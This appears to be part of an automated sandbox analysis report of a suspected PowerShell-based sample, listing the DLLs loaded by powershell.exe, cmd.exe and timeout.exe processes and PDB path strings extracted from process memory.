Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: avicap32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvfw32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | |
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | |
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll | |
Source: | Binary string: \??\C:\Windows\dll\System.Core.pdbb%R source: powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.Powershell.PSReadline.pdbpdbine.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: omation.pdbJ source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdb* source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb7 source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb; source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: omation.pdb\s' source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdbx source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivene.PDB source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb` source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Core.pdb00525341310004000001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f0 source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: omation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb]%K source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: sn.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbowW source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\Z:\syscalls\amsi64_7184.amsi.csve.pdb(V source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: e.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: omation.pdb.s source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbT source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: .pdbq source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Core.pdb? source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbZ] source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbF source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer320805 source: powershell.exe, 00000014.00000002.2491608753.000001F39452D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Core.pdby source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdbs% source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb189>K source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb29; source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer3281dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Core.pdbf source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp |